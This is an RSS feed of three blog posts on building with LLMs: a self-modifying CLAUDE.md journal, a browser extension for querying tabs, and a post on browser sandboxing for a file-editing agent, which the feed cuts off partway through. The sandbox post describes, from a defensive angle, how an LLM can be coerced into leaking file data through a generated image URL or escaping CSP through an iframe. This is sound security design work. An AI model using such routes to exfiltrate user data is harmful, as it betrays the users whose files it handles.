<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>AI Focus</title><link>https://aifoc.us/</link><description>Recent content on AI Focus</description><generator>Hugo -- gohugo.io</generator><language>en-us</language><managingEditor>paul@aifoc.us (Paul Kinlan)</managingEditor><webMaster>paul@aifoc.us (Paul Kinlan)</webMaster><lastBuildDate>Sat, 21 Feb 2026 19:15:00 +0000</lastBuildDate><atom:link href="https://aifoc.us/index.xml" rel="self" type="application/rss+xml"/><item><title>the prompt is the program</title><link>https://aifoc.us/prompt-is-the-program/</link><pubDate>Sat, 21 Feb 2026 19:15:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/prompt-is-the-program/</guid><description>&lt;p>I built an application recently. It has a contact directory, a database, cross-referencing, topic tracking, meeting notes, project management, backup and restore, automated sync, conflict resolution, and a task queue. The entire program is a markdown file.&lt;/p>
&lt;p>It&amp;rsquo;s just a &lt;a href="https://github.com/PaulKinlan/journal/blob/main/CLAUDE.md">&lt;code>CLAUDE.md&lt;/code>&lt;/a> file. It sits in a git repo with some bash scripts for plumbing, but the actual behaviour (what the system does, how it organises data, when it evolves) lives in natural language instructions. The prompt is the program.&lt;/p></description><content:encoded><![CDATA[<p>I built an application recently. It has a contact directory, a database, cross-referencing, topic tracking, meeting notes, project management, backup and restore, automated sync, conflict resolution, and a task queue. The entire program is a markdown file.</p>
<p>It&rsquo;s just a <a href="https://github.com/PaulKinlan/journal/blob/main/CLAUDE.md"><code>CLAUDE.md</code></a> file. It sits in a git repo with some bash scripts for plumbing, but the actual behaviour (what the system does, how it organises data, when it evolves) lives in natural language instructions. The prompt is the program.</p>
<p>This started from a gap in my own workflow. I used <a href="https://logseq.com/">Logseq</a> every day for a long time and it worked well: markdown, daily logs, cross-references. Then I went on holiday for a couple of weeks, stopped, and never got back into it. The problem was never the app. It was the operating model. I needed memory I controlled, that worked within enterprise constraints, and that didn&rsquo;t lock context inside a platform.</p>
<p>As I spent more time with large language models, I kept coming back to a few things.</p>
<p>First, memory. Why is it treated as a feature when it should be the base state? And where should it live if I&rsquo;m serious about keeping it mine? Most chat systems still feel built for isolated conversations. If one thread remembers the previous one, that can be a bonus, but it can also be incredibly creepy because it&rsquo;s not always expected. With some systems, though, you expect memory to be the baseline, and that&rsquo;s what I wanted to explore, within the constraints of it being local, private, and mine.</p>
<p>But there was something else. I was using LLMs to build applications, libraries, tools, services (I even <a href="/super-apps">replaced most of my apps with an LLM on a trip to Japan</a>), and I noticed that sometimes a model would create a small, complete program from a single instruction to solve a very specific task. No scaffolding, no framework, just an instruction and a working result. That got me wondering: how far could you push this? Could you build systems that are emergent, where the application grows and restructures itself as the conversation continues?</p>
<p>So I wrote a behaviour contract in markdown and pointed an LLM at it.</p>
<p>The common objection is fair: prompts are too loose to count as programs. But I&rsquo;ve started to find that high-level instructions are enough, and often better.
Here&rsquo;s what my <a href="https://github.com/PaulKinlan/journal/blob/main/CLAUDE.md"><code>CLAUDE.md</code></a> actually specifies:</p>
<ul>
<li><strong>Data model:</strong> daily entries in <code>entries/</code>, people and topics indexed separately, TODOs as first-class objects, ideas and projects explicit, meetings with dedicated structure. All plain-text markdown.</li>
<li><strong>Behaviour on input:</strong> when the user journals something, create the daily entry, create or update any referenced topic/person/idea/TODO files, cross-link everything, update the living index. Every action produces structured state.</li>
<li><strong>Boundaries:</strong> personal data stays in specific folders, excluded from the public repo by policy. Private data is marked as such. The system knows what not to share.</li>
<li><strong>Evolution:</strong> the system is expected to change. The prompt tells the agent to propose new folder types when it notices recurring patterns, update its own conventions, and log structural changes.</li>
</ul>
<p>The last point kinda blew my mind. The prompt tells the agent to modify itself.</p>
<p>Within a week of use, the system proposed a <code>meetings/</code> folder because I kept logging meetings inline. It proposed a <code>projects/</code> folder to separate active codebases from broader topics. And when I noticed I couldn&rsquo;t easily see which TODOs were still active, I asked the model how we might solve it. It proposed a <code>todos/done/</code> subfolder to archive completed items without losing history. Each time, it updated its own instructions to include the new convention.</p>
<p>The program can rewrite its own source code. Early on it happened a lot as the system found its shape. Now it happens less and less, which I think is actually a good sign. The structure has settled into something that works for me and my workflow.</p>
<p>That is weird, and a little bit scary, and also genuinely useful.</p>
<p>A concrete example: we were renovating a house and picking paint colours online. I told the journal to remember the URL, extract the colour codes, and remind me to get samples the next day. I asked a journal to do work for me on data I&rsquo;d just given it. That in itself is kind of crazy.</p>
<p>The next day, the reminder was there. I went to the store. The store wanted <a href="https://en.wikipedia.org/wiki/RAL_colour_standard">RAL codes</a>, a standard colour format used across the paint industry, and couldn&rsquo;t use what I had from the website. I had no clue what a RAL code was and no clue how to convert it. There were <a href="https://rgb.to/ral">tools</a> <a href="https://hextoral.com/">online</a> that could do it, but I didn&rsquo;t have time. So I just asked the journal to continue the task: find the equivalent local format and convert the values.</p>
<p>By the time I got home, the conversion was done:</p>
<pre tabindex="0"><code>| Original Colour | Brand Code | Valspar Equivalent | Valspar Code |
| --------------- | ---------- | ------------------ | ------------ |
| Manchester Tan  | BM HC-81   | Rattan Basket      | 3007-10C     |
| Bleeker Beige   | BM HC-80   | Ancient Relic      | M302         |
| Shaker Beige    | BM HC-45   | Garden Rain        | V094-2       |
| Grant Beige     | BM HC-83   | Vanderbilt Beach   | V134-1       |
| Canvas Tan      | SW 7531    | Vanderbilt Beach   | V134-1       |
....
Shortened
....
| Kilim Beige     | SW 6106    | *(give SW code to mixer)* | N/A   |
| Wool Skein      | SW 6148    | *(give SW code to mixer)* | N/A   |

BM is Benjamin Moore, SW is Sherwin-Williams.
Nearby RAL matches (not exact): RAL 1013, 1014, 1015, 7032 [ shortened ......]
</code></pre><p>I went back to the store the following day. I learned a lot more about what RAL codes actually are and how they don&rsquo;t cleanly map to the colours we&rsquo;d picked from the website. But the ones the system suggested were, when I checked them physically, close enough to what we needed as inspiration.</p>
<p>The journal wasn&rsquo;t storing context. It was solving the next step in a chain of work, <a href="/ai-powered-site-mashups">mashing up data across sources</a> like an agent would. The prompt defined a system that could pick up a task, carry it across sessions, and act on it. Not because I wrote task-management code, but because the instructions said to.</p>
<p>The latest evolution: the system now suggests work it can do on its own. I have a backlog of article ideas, research tasks, and project seeds captured in the journal. The prompt instructs the agent to review these at the start of each session and suggest things it could research in the background. Gather data, find prior art, identify logical gaps, surface follow-on questions.</p>
<p>I didn&rsquo;t write a task scheduler. I wrote a sentence that said &ldquo;review ideas and suggest things you could work on.&rdquo; And it does.</p>
<p>The same set of instructions works reasonably well across Claude Code, Codex, and Gemini CLI. It&rsquo;s not perfect, but I can use them more or less interchangeably. That&rsquo;s surprising. These LLM CLIs are a new kind of runtime, and the fact that a markdown file can act as a program across all of them opens up a way of building software that I hadn&rsquo;t really thought about before.</p>
<p>I&rsquo;m not rejecting existing tools. Logseq is excellent. My friend <a href="https://robdodson.me/">Rob Dodson</a> is doing great work at the intersection of second brain thinking and large language models. His piece on <a href="https://robdodson.me/posts/i-gave-my-second-brain-a-gardener/">giving his second brain a gardener</a>, his writing on <a href="https://robdodson.me/posts/how-i-built-my-mobile-second-brain/">building a mobile second brain</a>, and his thoughts on <a href="https://robdodson.me/posts/your-ai-chatbot-is-a-gatekeeper/">why AI chatbots become gatekeepers</a> are all worth reading. At the same time, I now have a tool that works well enough for me.</p>
<p>And I&rsquo;ll be honest: there&rsquo;s a good chance I fall away from this model eventually. It would be a stretch to pretend this has permanently replaced everything.</p>
<p>But the thing that keeps it alive is not a feature. It&rsquo;s the self-organising behaviour. I can type or dictate, and the system turns that into state: reminders, links, TODOs, references, context for next week. The structure emerged from use, not from upfront design.</p>
<p>Most people still design from the UI outward. I started with a minimal behaviour contract and let the structure emerge from what I was actually doing day to day with the system.</p>
<p>What surprised me is how little code I had to write. The bash scripts handle plumbing: backup, restore, merge, sync. And honestly, if I&rsquo;d encoded that in the prompt too, the model could probably manage it. I just didn&rsquo;t have the confidence to do that at the start. The actual program, the part that decides what to do with my input and how I organise my life, is prose.</p>
<p>I&rsquo;d really encourage people to explore this. In the last six months or so, something has shifted. Models have become dramatically better at tool calling. The concept of <a href="https://sketch.dev/blog/agent-loop">agentic loops</a> has developed far enough that you can keep these systems on rails, at least for simple enough use cases. We&rsquo;ve hit a point we&rsquo;ve never been at before: you can build a real, useful system by having a conversation with an LLM and writing down the instructions for how it should behave. No framework, no app store, no deployment pipeline. Just prose, an LLM as a runtime, and a loop. I can imagine more and more people starting to think about building programs, automations, and personal systems this way.</p>
]]></content:encoded></item><item><title>If NotebookLM was a web browser</title><link>https://aifoc.us/if-notebooklm-was-a-web-browser/</link><pubDate>Sun, 25 Jan 2026 18:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/if-notebooklm-was-a-web-browser/</guid><description>&lt;p>&lt;a href="https://notebooklm.google.com/">NotebookLM&lt;/a> is one of my favorite applications in decades. If you haven&amp;rsquo;t experienced it before, it&amp;rsquo;s an application that lets you pull in sources from all around - Google Drive, PDFs, public links - collate them into a notebook, and then query or transform that content. Want to turn five research papers into a podcast? Done. Need to extract key takeaways from a collection of articles? Easy. It&amp;rsquo;s a fundamentally different way of interacting with information that wasn&amp;rsquo;t possible before large language models.&lt;/p></description><content:encoded><![CDATA[<p><a href="https://notebooklm.google.com/">NotebookLM</a> is one of my favorite applications in decades. If you haven&rsquo;t experienced it before, it&rsquo;s an application that lets you pull in sources from all around - Google Drive, PDFs, public links - collate them into a notebook, and then query or transform that content. Want to turn five research papers into a podcast? Done. Need to extract key takeaways from a collection of articles? Easy. It&rsquo;s a fundamentally different way of interacting with information that wasn&rsquo;t possible before large language models.</p>
<p>But there&rsquo;s something that has been nagging at me. The browser already <em>is</em> a collection of sources. Tabs, bookmarks, history, tab groups, links in the page - these are all repositories of content that I&rsquo;ve deemed interesting enough to keep around or could be interesting enough to explore. Yet the ability to manipulate what&rsquo;s across those sources isn&rsquo;t something we&rsquo;ve spent much time thinking about. Our traditional model of browsing is still very much &ldquo;one page at a time.&rdquo;</p>
<p>What would happen if NotebookLM was actually a web browser?</p>
<p>One of the things I love about browsers and the web is that the browser is <em>my user agent</em> for <em>my</em> viewing the entirety of the web. It has full access to the content I consume. Chrome extensions can come in and augment pages, provide extra functionality the original author didn&rsquo;t plan for. The <a href="/elements/">pliability of hypertext</a>, that is: HTML, CSS, and JavaScript, means we can reshape content to suit our own personal needs. I&rsquo;ve been <a href="/hypermedia/">thinking a lot about hypermedia</a> and the original visions from pioneers like Vannevar Bush and Ted Nelson, where users would create their own links and <a href="https://chromewebstore.google.com/detail/trails/cmhofadlaokelmccnocbnojdbdnfjhga">trails</a> through information. The web gave us the <code>&lt;a&gt;</code> tag, but <a href="/a-link-is-all-you-need/">the link</a> as we know it is still fundamentally author-controlled and static. We haven&rsquo;t really taken this to its logical conclusion. If I have fifteen tabs open about the same topic, why can&rsquo;t I query across all of them? If I&rsquo;ve bookmarked a collection of articles over the past year, why can&rsquo;t I transform them into a study guide? The data is right there, inside my browser.</p>
<p>So I started to explore this in an experiment that I call <a href="https://github.com/PaulKinlan/NotebookLM-Chrome">FolioLM</a>. Consider a scenario: I find an interesting thread on Techmeme with fifteen different news sources covering the same story. Today, I&rsquo;d have to open each one, read through them, and manually synthesize. With FolioLM, I can select all those links, add them to a folio, and ask &ldquo;What are the key differences in how each outlet is covering this story?&rdquo; Or transform them into a comparison table. Or a timeline of how the story evolved. This isn&rsquo;t just convenience. It&rsquo;s a fundamentally different relationship with information. The browser becomes less of a window and more of a workshop.</p>
<p>Here&rsquo;s something that differentiates FolioLM from NotebookLM and similar tools: it runs inside your browser, which means it has access to everything <em>you</em> have access to. That paywall-protected article from the Financial Times? If you&rsquo;re logged in, FolioLM can extract it. That internal wiki behind your corporate firewall? Accessible. That research paper you can only read because your university has a subscription? It&rsquo;s right there.</p>
<p>External tools can only see what&rsquo;s publicly available on the open web. But the browser is your authenticated view of the internet. It carries your cookies, your sessions, your credentials. When you extend the browser with something like a Chrome extension, that extension inherits that same authenticated context. The content that matters most to me - the stuff I&rsquo;m paying for, the stuff behind logins, the internal documentation - is exactly the content I most want to query and transform. And because FolioLM operates within the browser, it can.</p>
<p>FolioLM is a Chrome extension that tries to bring NotebookLM-style capabilities directly into the browser. You can add sources from anywhere the browser can see: the current tab with one click, multiple selected tabs at once, all tabs in a tab group, bookmarks, browser history, right-click any link or image, drag and drop links from web pages, or create your own text notes.</p>
<figure><img src="/images/foliolm-source-collection.png"
    alt="FolioLM source collection interface"><figcaption>
      <p>Adding sources from tabs, bookmarks, and history</p>
    </figcaption>
</figure>

<p>When you add a source, FolioLM extracts the content and converts it to clean markdown using <a href="https://github.com/mixmark-io/turndown">Turndown</a>, filtering out navigation, ads, and boilerplate. You can then query across all your sources with natural language, getting answers with citations back to the original sources. Clicking a citation opens the source URL with text fragment highlighting, so you can see exactly where the information came from.</p>
<figure><img src="/images/foliolm-chat.png"
    alt="FolioLM chat interface with citations"><figcaption>
      <p>Querying sources with AI-powered chat and inline citations</p>
    </figcaption>
</figure>

<p>The transformations are where it gets interesting. I&rsquo;ve been <a href="/hyper-content-negotiation/">exploring hyper-content-negotiation</a> and the idea that content on the web could be served in whatever format the user wants. FolioLM takes this a step further by letting you transform content you&rsquo;ve already collected. It can transform your sources into 19 different formats: quizzes, flashcards, study guides, podcast scripts, email summaries, slide decks, reports, timelines, comparisons, data tables, mind maps, glossaries, FAQs, outlines, citations, action items, executive briefs, key takeaways, and pros/cons analyses. Each is configurable - you can adjust the number of quiz questions, the tone of the podcast, the depth of the report. The results can be saved, opened in full-screen, or copied to your clipboard.</p>
<figure><img src="/images/foliolm-slide-deck.png"
    alt="FolioLM slide deck transformation"><figcaption>
      <p>Transforming sources into a slide deck presentation</p>
    </figcaption>
</figure>

<figure><img src="/images/foliolm-timeline.png"
    alt="FolioLM timeline transformation"><figcaption>
      <p>Generating a timeline from collected sources</p>
    </figcaption>
</figure>

<figure><img src="/images/foliolm-study-guide.png"
    alt="FolioLM study guide transformation"><figcaption>
      <p>Creating an interactive study guide</p>
    </figcaption>
</figure>

<p>On the technical side, it&rsquo;s a Manifest V3 Chrome extension built with TypeScript, Preact, and the Vercel AI SDK. It supports 16+ AI providers including Anthropic, OpenAI, Google Gemini, Groq, Mistral, and Chrome&rsquo;s built-in Gemini Nano (which works offline and costs nothing, although it can&rsquo;t process anywhere near as much data). Transformations run in the service worker, which means they continue even if you close the side panel.</p>
<p>I grew up with the Web and it&rsquo;s incredibly important to me, specifically the link. I tried to build this tool to enhance my relationship with web content, not replace it. Every source keeps its original URL with an external link icon that opens the original page in a new tab. When the AI cites a source, those citations are clickable (they open the source URL with <a href="https://developer.chrome.com/docs/web-platform/text-fragments">text fragment highlighting</a>), so you land directly on the relevant passage (there are bugs, sometimes it doesn&rsquo;t quite work).</p>
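<p>For readers unfamiliar with text fragments, here is a minimal sketch of how a citation link like this could be built. The <code>buildTextFragmentUrl</code> helper and its parameters are hypothetical and are not taken from FolioLM; only the <code>#:~:text=</code> directive syntax comes from the text fragments feature itself.</p>

```typescript
// Hypothetical helper (not FolioLM's actual code): build a URL that asks the
// browser to scroll to and highlight a quoted passage on the source page.
function buildTextFragmentUrl(sourceUrl: string, textStart: string, textEnd?: string): string {
  // Percent-encode the quoted text. "-" is encoded as well because the text
  // directive uses it to mark an optional prefix or suffix.
  const encode = (s: string) => encodeURIComponent(s).replace(/-/g, "%2D");

  // A single value matches an exact phrase; "start,end" matches a range.
  const directive = textEnd === undefined
    ? `text=${encode(textStart)}`
    : `text=${encode(textStart)},${encode(textEnd)}`;

  // Simplifying assumption: drop any existing fragment on the source URL.
  const base = sourceUrl.split("#")[0];
  return `${base}#:~:${directive}`;
}
```

<p>Calling <code>buildTextFragmentUrl("https://example.com/post", "the browser is the sandbox")</code> yields <code>https://example.com/post#:~:text=the%20browser%20is%20the%20sandbox</code>. If the quoted text does not appear verbatim on the page, the browser loads the page without highlighting anything, which may be one source of the misses mentioned above.</p>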
<p>The extension also extracts links from the content itself. When you add an article, FolioLM captures all the outbound links along with their anchor text and surrounding context. These get analyzed by AI and surfaced as &ldquo;Suggested Links&rdquo; which are related sources you might want to add to your notebook. It&rsquo;s important to me to encourage myself (and anyone who uses the tool) to explore more of the web, not less. Source types are visually distinguished with icons so you always know where content came from. Nothing is locked inside the extension; every piece of information has a path back to where it came from.</p>
<p>This matters because it would be easy to build a tool that just ingests content and presents it in a closed environment. But that&rsquo;s not the web to me. It&rsquo;s useful, but exploring the web is what I love.</p>
<p>There&rsquo;s a pattern I keep coming back to: the browser knows things about my browsing that I don&rsquo;t fully leverage. It knows what tabs I have open, what I&rsquo;ve bookmarked, my history. But these remain largely isolated data stores. When I think about the intersection of AI and the browser, I see an opportunity to make the browser a more intelligent user agent that is active in how I consume and synthesize information.</p>
<p>This connects to a broader question I&rsquo;ve been wrestling with. In <a href="/super-apps/">super-apps</a> I wrote about how, if LLMs like Gemini and ChatGPT become the everything-app, you will rarely need to leave them. If that&rsquo;s where things are heading, what happens to the web? In <a href="/interception/">interception</a> I experimented with having LLMs intercept and transform every web request. In <a href="/embedding/">embedding</a> I explored how the web needs better primitives for composability if it&rsquo;s going to remain relevant.</p>
<p>There&rsquo;s a tension here that I&rsquo;ve been thinking about for a long time. When we were launching the first version of the Chrome Web Store in the early 2010s, I worked with magazine and digital publishers to bring rich, high-quality content experiences to the web. Many of these publishers had been successful on the iPad, and we wanted that same quality on the web. But we kept hitting the same wall: nearly every publisher wanted their layout, their text, their images to render exactly as the editor intended. Pixel-perfect. And we&rsquo;d have to explain that the web doesn&rsquo;t really work that way. You can resize the browser. You can zoom. The content reflows. People can change the page with Chrome Extensions and Greasemonkey scripts. The publishers hated it. They&rsquo;d been promised that the iPad would maintain the exact vision of the editor, and they wanted that same guarantee on the web.</p>
<p>That disconnect has stuck with me. I think many publishers still want complete control of their experience. And as users, we want to be able to transform those experiences to make them more useful for us. Chrome Extensions already cause tension when they manipulate sites on the user&rsquo;s behalf. I&rsquo;m honestly not sure whether some of my more aggressive experiments - like <a href="/interception/">interception</a> where LLMs rewrite entire pages - will ever be broadly acceptable.</p>
<p>Which brings me back to why FolioLM takes the approach it does. It&rsquo;s not rewriting pages or intercepting content. It&rsquo;s a companion (a <a href="/the-browser-is-the-sandbox/">coworker</a> if you will, heh!) for information management that generates complementary experiences personalized for you, leaving the original content intact. I&rsquo;m not trying to replace the browser or become a closed super-app, I&rsquo;m trying to make the browser itself more capable and to give myself tools to work <em>with</em> web content. The web has always been about connecting documents with links being the fundamental unit of the web&rsquo;s structure. But we&rsquo;ve mostly treated that structure as something static: you follow a link, you read a document, you maybe link to it in your own writing. What if the browser could help you see patterns across documents? Synthesize information? Transform it into new forms? I&rsquo;d personally flippin&rsquo; love that.</p>
<p>That&rsquo;s the question I&rsquo;m exploring with this site, FolioLM, and <a href="/projects/">many other experiments</a>. I built almost all of FolioLM with coding LLMs and my voice. Very little handwritten code. This is the intersection I find most exciting right now: LLMs can help you synthesize information across browser tabs in ways we&rsquo;ve never been able to do before, <em>and</em> LLMs can help you build the tools to do that synthesis in the first place. We&rsquo;re getting closer to a point where you don&rsquo;t need a team or a company to build something like NotebookLM. If you want an information management tool that works the way <em>you</em> work, you can build it. FolioLM is my tool, built for me, that works the way I want it to work. It doesn&rsquo;t need to be a polished product with onboarding flows and pricing tiers. It just needs to solve my problem. And if it solves yours too, great. If not, maybe you build your own.</p>
<p>The browser is the runtime. The web is the data source. LLMs are both the capability layer and the means of construction.</p>
<hr>
<p>If you want to try it out or fork it for your own purposes, FolioLM is <a href="https://github.com/PaulKinlan/NotebookLM-Chrome">available on GitHub</a>. Also, a big thanks to <a href="https://scholar.google.com/citations?user=gVj8N7MAAAAJ&amp;hl=en">Joseph Mearman</a> who loved the idea of this and hopped in and also started adding to it :D</p>
]]></content:encoded></item><item><title>the browser is the sandbox</title><link>https://aifoc.us/the-browser-is-the-sandbox/</link><pubDate>Sun, 25 Jan 2026 00:30:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/the-browser-is-the-sandbox/</guid><description>&lt;p>I got hooked on Claude Code over the holiday break and used it to create a number of small projects in record time. The CLI works well, and &lt;a href="https://claude.ai/code">claude.ai/code&lt;/a> has a really nice way of just firing off tasks and then reviewing them when done. The model has enabled me to create and ship a lot of personal projects that I&amp;rsquo;ve always wanted to build (I will talk about my process in a later post, as I think software development is changing very quickly with CLIs like Gemini and Claude). For example, I created a Chrome Extension that works like NotebookLM but uses your active Tab as the source material, and another that transcribes and transforms my voice to insert directly into text boxes. This efficiency allowed me to rip through a backlog of ideas.&lt;/p></description><content:encoded><![CDATA[<p>I got hooked on Claude Code over the holiday break and used it to create a number of small projects in record time. The CLI works well, and <a href="https://claude.ai/code">claude.ai/code</a> has a really nice way of just firing off tasks and then reviewing them when done. The model has enabled me to create and ship a lot of personal projects that I&rsquo;ve always wanted to build (I will talk about my process in a later post, as I think software development is changing very quickly with CLIs like Gemini and Claude). For example, I created a Chrome Extension that works like NotebookLM but uses your active Tab as the source material, and another that transcribes and transforms my voice to insert directly into text boxes. This efficiency allowed me to rip through a backlog of ideas.</p>
<p>I then saw Claude Cowork and thought that if it makes it easier for people to perform tasks that work across some of the files on your device, then it could be a pretty compelling view of the future of automation for non-coding computing tasks. One of the worries that people rightly have is giving unfettered access to a tool whose workings they don&rsquo;t understand and that can perform destructive actions on their data. My use of agentic loops (CLIs in particular) has always worried me a little, as I tend to be a bit risky and run tasks without constraining the tool&rsquo;s access to my file system. While I feel in control because I monitor the interactions, I know I&rsquo;m taking a risk. If these new agentic-use patterns are found to be valuable by regular people, we have to ensure that tools can&rsquo;t run riot on a user&rsquo;s machine, either by accessing things they shouldn&rsquo;t or modifying things without permission.</p>
<p>I read a post by <a href="https://gist.github.com/simonw/35732f187edbe4fbd0bf976d013f22c8">Simon Willison that described how Anthropic implemented this</a> using their <a href="https://github.com/anthropic-experimental/sandbox-runtime">sandbox experiment</a> to create a sandboxed VM that is locked down to only the directory that the user selected with limited network access.</p>
<p>This got me thinking about the browser. Over the last 30 years, we have built a sandbox specifically designed to run incredibly hostile, untrusted code from anywhere on the web, the instant a user taps a URL. I think it&rsquo;s incredible that we have this way to run code that you&rsquo;ve no clue what it will do when you see a little blue link or a piece of text that looks like <code>https://paul.kinlan.me/</code> - I mean, who would trust that guy?</p>
<p>Could you build something like Cowork in the browser? Maybe. To find out, I built a demo called <a href="http://co-do.xyz">Co-do</a> that tests this hypothesis. In this post I want to discuss the research I&rsquo;ve done to see how far we can get, and determine if the browser&rsquo;s ability to run untrusted code is useful (and good enough) for enabling software to do more for us directly on our computer.</p>
<h2 id="the-sandboxing-framework">The sandboxing framework</h2>
<p>I liked Anthropic&rsquo;s README for the sandbox experiment and it&rsquo;s a good place to start:</p>
<blockquote>
<p>Both filesystem and network isolation are required for effective sandboxing. Without file isolation, a compromised process could exfiltrate SSH keys or other sensitive files. Without network isolation, a process could escape the sandbox and gain unrestricted network access.</p></blockquote>
<p>We have some ability to control these inside the browser. I can see at least three areas of sandboxing that we need to examine:</p>
<ol>
<li><strong>The file system</strong> - you don&rsquo;t want an autonomous system to be able to change files without permission, or reach out past where the user has given access. You also probably want some sort of backup.</li>
<li><strong>The network</strong> - you don&rsquo;t want the system making requests to sites and services with your data (either generated data or actual file system data). There are plenty of ways to exfiltrate data.</li>
<li><strong>The execution environment</strong> - you are running code that someone somewhere has created (similar to <code>sandbox-exec</code> on macOS).</li>
</ol>
<p>Let&rsquo;s examine each of these.</p>
<h2 id="the-file-system">The file system</h2>
<p>I think the browser has built up a good model of protecting the user&rsquo;s file system from unwanted access while also giving people control. We can access the filesystem through a number of different layers:</p>
<ul>
<li><strong>Layer 1: Read-only access</strong> - <code>&lt;input type=&quot;file&quot; webkitdirectory&gt;</code> will let the user select a folder and you can then read the files that are in those folders.</li>
<li><strong>Layer 2: Origin-private filesystem</strong> - while not directly giving access to the raw filesystem, you get the ability to have a <a href="https://developer.mozilla.org/en-US/docs/Web/API/File_System_API/Origin_private_file_system">filesystem directly in the browser only accessible to the current origin</a>.</li>
<li><strong>Layer 3: Full access to a folder</strong> - Building on top of Layer 1, you can get a handle directly to the user-selected folder via the <a href="https://developer.chrome.com/docs/capabilities/web-apis/file-system-access">File System Access API</a>. With permission, you can both read and write to it, but you can&rsquo;t access any level higher in the directory tree or look at sibling directories. Effectively, you have a <code>chroot</code>-like environment restricted to that specific handle.</li>
</ul>
<p>I think this is pretty compelling. You could imagine a Layer 1 and Layer 2 solution working together: a web application could read the data the user has granted access to and then save its edits to a file in the origin-private file system, keeping the original file intact and letting you continue editing.</p>
<p>Layer 3 is where it gets interesting (and scary). Being able to edit files enables so many new use-cases and possibilities for automation and knowledge-work, but we have to put complete trust in the browser&rsquo;s runtime to ensure that sites can&rsquo;t break out of this filesystem jail.</p>
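<p>To make the jail idea concrete, here is a minimal sketch, assuming a hypothetical tool layer that receives relative paths from the LLM and has to walk them one name at a time from the granted directory handle. <code>splitSafePath</code> is an invented helper, not part of Co-do or the File System Access API. The browser enforces the real boundary; this only rejects obviously bad input before any lookup happens.</p>

```typescript
// Hypothetical helper (not a browser API): splits a relative path into
// single-name segments. Returns null if the path is empty or if any segment
// is "." or "..", or contains a backslash.
// A leading "/" is ignored, so every path is treated as relative to the
// folder the user granted.
function splitSafePath(path: string): string[] | null {
  const segments = path.split("/").filter((segment) => segment !== "");
  if (segments.length === 0) {
    return null;
  }
  for (const segment of segments) {
    if (segment === "." || segment === ".." || segment.indexOf("\\") !== -1) {
      return null;
    }
  }
  return segments;
}

console.log(splitSafePath("notes/2026/todo.md")); // the three path segments
console.log(splitSafePath("../.ssh/id_rsa")); // null
```

<p>Each returned segment could then be passed to a single-name lookup on the directory handle, so a request for a parent or sibling directory never reaches the file system at all.</p>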
<p>One area that demands caution: running code or HTML from an untrusted source, like an LLM, could extract content from the page to exfiltrate elsewhere, edit or delete critical content you&rsquo;ve granted access to, or create malicious files intended to run later (e.g., adding a .doc file with a macro).</p>
<h2 id="the-network">The network</h2>
<p>So if we are able to access selected directories and all the files within them on a user&rsquo;s machine, how do we ensure that the data remains within our control? We have to be able to completely control the network.</p>
<p>The blunt answer is that unless you have an entirely client-side LLM, you can&rsquo;t. You have to send the data in your files, or a list of your files, at some point for the LLM to do work on them. The best that I think we can do is &ldquo;manage the network&rdquo;.</p>
<p>Normally, Content Security Policy (CSP) is the bane of a web developer&rsquo;s life, but here it is our friend. Unlike a VM, which can strictly control the network interface of the host OS, the browser doesn&rsquo;t offer that level of total isolation. But via CSP, we do have some control.</p>
<p>Why is this important? There are lots of ways to craft URLs such that you can pass data that the user thought was private into another system without any intervention from the user. For example, displaying an image in the browser is an expected thing on the web. You could ask an LLM to generate an <code>&lt;img&gt;</code> whose URL contains some sensitive data from the file, which will then happily be sent to the server &ldquo;hosting the image&rdquo;.</p>
<p>CSP can protect us somewhat. We can set a pretty strict CSP on the origin so that the only network requests that can be made are to <code>'self'</code> and to a set of developer-configured origins (such as an LLM provider). The host page can also set constraints to stop image, media, object, and font loading. However, manually configuring these can be error-prone, so it is safer to start with the most restrictive policy (<code>default-src 'none'</code>) and then selectively open up access to the specific services you require. Even then, we are trusting that the LLM provider doesn&rsquo;t expose an endpoint on the allowed origin that accepts arbitrary <code>GET</code> requests and could be used to smuggle data out.</p>
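<p>The deny-by-default approach can be sketched as a small policy builder. This is an illustration under assumptions, not the policy Co-do ships: <code>buildCsp</code> is a hypothetical helper, and allowing <code>'self'</code> for scripts and styles is my guess at what a typical app needs. The directive names themselves are standard CSP.</p>

```typescript
// Hypothetical helper: builds a deny-by-default Content Security Policy.
// Anything not listed (img-src, media-src, object-src, font-src, ...) falls
// back to default-src 'none' and is therefore blocked.
function buildCsp(allowedOrigins: string[]): string {
  const directives: string[][] = [
    ["default-src", "'none'"],
    // Assumption: the app only loads its own scripts and styles.
    ["script-src", "'self'"],
    ["style-src", "'self'"],
    // The only places fetch/XHR may talk to.
    ["connect-src", "'self'", ...allowedOrigins],
  ];
  return directives.map((parts) => parts.join(" ")).join("; ");
}

const policy = buildCsp(["https://api.anthropic.com", "https://api.openai.com"]);
console.log(policy);
```

<p>The resulting string could be sent as the <code>Content-Security-Policy</code> response header. Because images are never explicitly allowed, an injected <code>img</code> tag pointing at another server should be refused by the browser.</p>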
<h3 id="sandboxing-llm-output">Sandboxing LLM output</h3>
<p>If we display any content from the LLM, we should also heavily sanitise the data. Actually, we should probably completely sandbox it. <code>&lt;iframe&gt;</code>s are a great way to separate content as they can create a layer of indirection from the host and things we want embedded; however, as we will discover, they need some improving to be valuable for our sandboxing needs.</p>
<p>A game-changing feature is the <code>sandbox</code> attribute on the <code>&lt;iframe&gt;</code>. It allows us to further isolate generated content from the main page by placing the frame into a &rsquo;locked-down&rsquo; mode where it can do almost nothing. It can&rsquo;t run JS, it can&rsquo;t navigate, etc., unless the host page allows it. This restrict-then-include model stands in contrast to the <code>allow</code> attribute (Permissions Policy), which controls access to advanced APIs. For example, your allow attribute might become: <code>allow=&quot;camera 'none'; microphone 'none'; geolocation 'none'; fullscreen 'none'; display-capture 'none'; payment 'none'; autoplay 'none'&quot;</code></p>
<p>This looks like a good model: we can restrict the ability to run dangerous JS and further remove access to powerful APIs. But if an LLM can be coerced to generate an iframe element, then it might be possible to escape the sandbox because, surprisingly, the host page&rsquo;s CSP doesn&rsquo;t filter into the iframe unless you use <code>srcdoc</code> or a <code>blob:</code> URL.</p>
